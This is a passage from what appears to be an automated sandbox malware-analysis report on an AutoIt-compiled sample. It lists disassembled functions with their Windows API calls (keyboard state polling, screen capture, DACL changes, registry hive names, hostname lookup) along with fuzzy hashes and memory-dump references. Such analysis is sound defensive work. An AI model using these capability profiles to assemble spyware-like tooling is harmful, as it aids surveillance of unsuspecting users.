                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E6854A
                                            • CopySid.ADVAPI32(00000000), ref: 00E68551
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E68582
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E685A8
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E685BC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 3996160137-0
                                            • Opcode ID: 8a93477c07455e5d2f4d8386c49cfbb5a3f34f39e5258f5822000e943ab55181
                                            • Instruction ID: b034e71bd899c8924ffb3e402b314cd9b624af299344a0b57481acd1177b81fc
                                            • Opcode Fuzzy Hash: 8a93477c07455e5d2f4d8386c49cfbb5a3f34f39e5258f5822000e943ab55181
                                            • Instruction Fuzzy Hash: 3A615971940209AFDF00DFA1ED45AAEBBB9FF04344F14822AE815F6291DB319A14CF60
                                            Function 00E8762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDC.USER32(00000000), ref: 00E876A2
                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E876AE
                                            • CreateCompatibleDC.GDI32(?), ref: 00E876BA
                                            • SelectObject.GDI32(00000000,?), ref: 00E876C7
                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E8771B
                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E87757
                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E8777B
                                            • SelectObject.GDI32(00000006,?), ref: 00E87783
                                            • DeleteObject.GDI32(?), ref: 00E8778C
                                            • DeleteDC.GDI32(00000006), ref: 00E87793
                                            • ReleaseDC.USER32(00000000,?), ref: 00E8779E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                            • String ID: (
                                            • API String ID: 2598888154-3887548279
                                            • Opcode ID: 83cbbd1b427135ef692a47febbc83e88106b759feed41af55fd3a1f3e59f97c7
                                            • Instruction ID: b947b96d516830f2ef7b7e1cacd623493fc0e3e84d225f157542c6a92fc86bd1
                                            • Opcode Fuzzy Hash: 83cbbd1b427135ef692a47febbc83e88106b759feed41af55fd3a1f3e59f97c7
                                            • Instruction Fuzzy Hash: 57514C75904209EFCB15DFA9CC85EAEBBB9EF48710F14842EF989E7211D731A844CB50
                                            Function 00E16BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E30B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E16C6C,?,00008000), ref: 00E30BB7
                                              • Part of subcall function 00E148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E148A1,?,?,00E137C0,?), ref: 00E148CE
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E16D0D
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E16E5A
                                              • Part of subcall function 00E159CD: _wcscpy.LIBCMT ref: 00E15A05
                                              • Part of subcall function 00E3387D: _iswctype.LIBCMT ref: 00E33885
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                            • API String ID: 537147316-1018226102
                                            • Opcode ID: 4cfe12452407e30650b830b088ef8e85a6a56f999cbf2e6f1b2178d07d991bf4
                                            • Instruction ID: 5268bc75a65b056228714b8127d30b10cb08c9cca531f60348eea7153ab37404
                                            • Opcode Fuzzy Hash: 4cfe12452407e30650b830b088ef8e85a6a56f999cbf2e6f1b2178d07d991bf4
                                            • Instruction Fuzzy Hash: 0D027D711083419FC724EF24D881AAFBBE5BF98354F14691DF4DAA72A1DB30D989CB42
                                            Function 00E145DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E145F9
                                            • GetMenuItemCount.USER32(00ED6890), ref: 00E4D7CD
                                            • GetMenuItemCount.USER32(00ED6890), ref: 00E4D87D
                                            • GetCursorPos.USER32(?), ref: 00E4D8C1
                                            • SetForegroundWindow.USER32(00000000), ref: 00E4D8CA
                                            • TrackPopupMenuEx.USER32(00ED6890,00000000,?,00000000,00000000,00000000), ref: 00E4D8DD
                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E4D8E9
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                            • String ID:
                                            • API String ID: 2751501086-0
                                            • Opcode ID: b1285af7602d3c6d0c9c990c45a5ae723f31e65af69bdb1a8489f4c38b3c0907
                                            • Instruction ID: d022c471e8a18e698f72ed50f06c87111654b378e13967cea81fa697bb114445
                                            • Opcode Fuzzy Hash: b1285af7602d3c6d0c9c990c45a5ae723f31e65af69bdb1a8489f4c38b3c0907
                                            • Instruction Fuzzy Hash: 0571C170605205BEEB218F65EC49FEABFA4FF05368F205217F519B62E1C7B16860DB90
                                            Function 00E88BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 00E88BEC
                                            • CoInitialize.OLE32(00000000), ref: 00E88C19
                                            • CoUninitialize.OLE32 ref: 00E88C23
                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00E88D23
                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E88E50
                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00EA2C0C), ref: 00E88E84
                                            • CoGetObject.OLE32(?,00000000,00EA2C0C,?), ref: 00E88EA7
                                            • SetErrorMode.KERNEL32(00000000), ref: 00E88EBA
                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E88F3A
                                            • VariantClear.OLEAUT32(?), ref: 00E88F4A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                            • String ID: ,,
                                            • API String ID: 2395222682-1556401989
                                            • Opcode ID: 6a8cfeca95fb087e623b0fef40111992e42b2679976d7e812daccdc27d87733b
                                            • Instruction ID: a1a78776c6ae61fdd0d279c660a14d99747ea137ae7f2bcfd1f7d21214b3754a
                                            • Opcode Fuzzy Hash: 6a8cfeca95fb087e623b0fef40111992e42b2679976d7e812daccdc27d87733b
                                            • Instruction Fuzzy Hash: 66C13371608305AFC704EF64C98496BB7E9BF88348F00592DF98AEB261DB31ED05CB52
                                            Function 00E910A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E90038,?,?), ref: 00E910BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                            • API String ID: 3964851224-909552448
                                            • Opcode ID: 8a4c70a58204f93521b7e149f80d8363231d38956f8b28c60ae98feb1f2b6bd7
                                            • Instruction ID: 92a78443be85e7aa033cfa0a5838ecbe5267d0a45e45f39c70486653fa8a2273
                                            • Opcode Fuzzy Hash: 8a4c70a58204f93521b7e149f80d8363231d38956f8b28c60ae98feb1f2b6bd7
                                            • Instruction Fuzzy Hash: 9B415C3014124BDBCF10EF90D9A6AEB37B8AF51304F516499FC917B291DB31A95ACB50
                                            Function 00E75569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                              • Part of subcall function 00E17A84: _memmove.LIBCMT ref: 00E17B0D
                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E755D2
                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E755E8
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E755F9
                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E7560B
                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E7561C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: SendString$_memmove
                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                            • API String ID: 2279737902-1007645807
                                            • Opcode ID: e029c3a029a76577f66398873eac7f8822509676ca9a445ff7a3b0c820675849
                                            • Instruction ID: 69731b1b0a7267eb59a9b6ed7e8e8f80e322a1f0ef6e46be4b2789c77f68a65d
                                            • Opcode Fuzzy Hash: e029c3a029a76577f66398873eac7f8822509676ca9a445ff7a3b0c820675849
                                            • Instruction Fuzzy Hash: AA11C4316502AD79D720B6A5CC5AEFFBBBCEF91F04F44242EB415B20D1DEA10D46C5A1
                                            Function 00E748F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                            • String ID: 0.0.0.0
                                            • API String ID: 208665112-3771769585
                                            • Opcode ID: 4ae7d6b0ae8fb6d06a8c9ff5f9570badba68c686b46ae644e3d4a8667ec28f2f
                                            • Instruction ID: d57c8d7e7534988f8e7bda1d9ff707d68f4606fed448ff776d74c6b66ff396ba
                                            • Opcode Fuzzy Hash: 4ae7d6b0ae8fb6d06a8c9ff5f9570badba68c686b46ae644e3d4a8667ec28f2f
                                            • Instruction Fuzzy Hash: 2B11F371A04115AFCB24AB649C0AEDB7BEC9F40710F0451BBF648F2091EF719A85CA51
                                            Function 00E75217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • timeGetTime.WINMM ref: 00E7521C
                                              • Part of subcall function 00E30719: timeGetTime.WINMM(?,75A4B400,00E20FF9), ref: 00E3071D
                                            • Sleep.KERNEL32(0000000A), ref: 00E75248
                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00E7526C
                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E7528E
                                            • SetActiveWindow.USER32 ref: 00E752AD
                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E752BB
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E752DA
                                            • Sleep.KERNEL32(000000FA), ref: 00E752E5
                                            • IsWindow.USER32 ref: 00E752F1
                                            • EndDialog.USER32(00000000), ref: 00E75302
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                            • String ID: BUTTON
                                            • API String ID: 1194449130-3405671355
                                            • Opcode ID: 266a61d233cdf0945a906d2987ce58a85af1c732e89884a20e56a8094746e22a
                                            • Instruction ID: 0e5dc1cf6282dcb6dc472f9988d725fd11a478279ef7639f28fba966b5723bef
                                            • Opcode Fuzzy Hash: 266a61d233cdf0945a906d2987ce58a85af1c732e89884a20e56a8094746e22a
                                            • Instruction Fuzzy Hash: CC21C672205704BFE7005B72FD89B253B6AEB4434AF00643BF409F11B6EBB19C189B62
                                            Function 00E7D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • CoInitialize.OLE32(00000000), ref: 00E7D855
                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E7D8E8
                                            • SHGetDesktopFolder.SHELL32(?), ref: 00E7D8FC
                                            • CoCreateInstance.OLE32(00EA2D7C,00000000,00000001,00ECA89C,?), ref: 00E7D948
                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E7D9B7
                                            • CoTaskMemFree.OLE32(?,?), ref: 00E7DA0F
                                            • _memset.LIBCMT ref: 00E7DA4C
                                            • SHBrowseForFolderW.SHELL32(?), ref: 00E7DA88
                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E7DAAB
                                            • CoTaskMemFree.OLE32(00000000), ref: 00E7DAB2
                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E7DAE9
                                            • CoUninitialize.OLE32(00000001,00000000), ref: 00E7DAEB
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                            • String ID:
                                            • API String ID: 1246142700-0
                                            • Opcode ID: 46e0f00f927d2793b197f8c02b2fb16db202e75c3d4f153e29f16d4f747cf044
                                            • Instruction ID: 1fafbc046a99717fd96ee33fb9a8c591deacc667baede6051d6fdadbd9af6416
                                            • Opcode Fuzzy Hash: 46e0f00f927d2793b197f8c02b2fb16db202e75c3d4f153e29f16d4f747cf044
                                            • Instruction Fuzzy Hash: 6DB1FA75A00119AFDB14DFA4C889DAEBBF9FF88304B149469F50AEB251DB30ED45CB50
                                            Function 00E7052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00E705A7
                                            • SetKeyboardState.USER32(?), ref: 00E70612
                                            • GetAsyncKeyState.USER32(000000A0), ref: 00E70632
                                            • GetKeyState.USER32(000000A0), ref: 00E70649
                                            • GetAsyncKeyState.USER32(000000A1), ref: 00E70678
                                            • GetKeyState.USER32(000000A1), ref: 00E70689
                                            • GetAsyncKeyState.USER32(00000011), ref: 00E706B5
                                            • GetKeyState.USER32(00000011), ref: 00E706C3
                                            • GetAsyncKeyState.USER32(00000012), ref: 00E706EC
                                            • GetKeyState.USER32(00000012), ref: 00E706FA
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00E70723
                                            • GetKeyState.USER32(0000005B), ref: 00E70731
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: f21b0fed5529de5f49d8c5562133ad6171e97a95358c2cd2a856d7d5925e5d65
                                            • Instruction ID: db707b1f255c14050a1bbb2f103bcbcc1d3ae0cf69da3c933ceeb7be6c872de8
                                            • Opcode Fuzzy Hash: f21b0fed5529de5f49d8c5562133ad6171e97a95358c2cd2a856d7d5925e5d65
                                            • Instruction Fuzzy Hash: 1C510C20A0478459FB35EBB088547EABFF49F01384F08D59ED5CA7A5C2DA649B8CCF52
                                            Function 00E6C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,00000001), ref: 00E6C746
                                            • GetWindowRect.USER32(00000000,?), ref: 00E6C758
                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E6C7B6
                                            • GetDlgItem.USER32(?,00000002), ref: 00E6C7C1
                                            • GetWindowRect.USER32(00000000,?), ref: 00E6C7D3
                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E6C827
                                            • GetDlgItem.USER32(?,000003E9), ref: 00E6C835
                                            • GetWindowRect.USER32(00000000,?), ref: 00E6C846
                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E6C889
                                            • GetDlgItem.USER32(?,000003EA), ref: 00E6C897
                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E6C8B4
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00E6C8C1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$ItemMoveRect$Invalidate
                                            • String ID:
                                            • API String ID: 3096461208-0
                                            • Opcode ID: bea3cc45ec25fb362aec595f696c4a95debc3d0bc9a164990d4a747b392ad7b9
                                            • Instruction ID: 9dfda37272fa18f78d22fc98ceaa5b88b5b8a44ecca27d23b1e1e7061adc3ec6
                                            • Opcode Fuzzy Hash: bea3cc45ec25fb362aec595f696c4a95debc3d0bc9a164990d4a747b392ad7b9
                                            • Instruction Fuzzy Hash: 67515371B00205AFDB18CFA9DD85A6DBBB5EB88310F14812EF515E7291D770AD44CB50
                                            Function 00E1201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E12036,?,00000000,?,?,?,?,00E116CB,00000000,?), ref: 00E11B9A
                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E120D3
                                            • KillTimer.USER32(-00000001,?,?,?,?,00E116CB,00000000,?,?,00E11AE2,?,?), ref: 00E1216E
                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00E4BEF6
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E116CB,00000000,?,?,00E11AE2,?,?), ref: 00E4BF27
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E116CB,00000000,?,?,00E11AE2,?,?), ref: 00E4BF3E
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E116CB,00000000,?,?,00E11AE2,?,?), ref: 00E4BF5A
                                            • DeleteObject.GDI32(00000000), ref: 00E4BF6C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                            • String ID:
                                            • API String ID: 641708696-0
                                            • Opcode ID: 79f49353e98a48da60d100520d3f8c0f82da5d5858b4ccf994015a08e7030e89
                                            • Instruction ID: 5aa7d416b238c412097ac1b37b0c657deb3e01be1396c1b8d32f93b9e8a04fa7
                                            • Opcode Fuzzy Hash: 79f49353e98a48da60d100520d3f8c0f82da5d5858b4ccf994015a08e7030e89
                                            • Instruction Fuzzy Hash: 7561AE34201600EFCB25DF15ED48BA977F1FB44319F10652EE642B69A0C775A8A9DF80
                                            Function 00E121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E125DB: GetWindowLongW.USER32(?,000000EB), ref: 00E125EC
                                            • GetSysColor.USER32(0000000F), ref: 00E121D3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
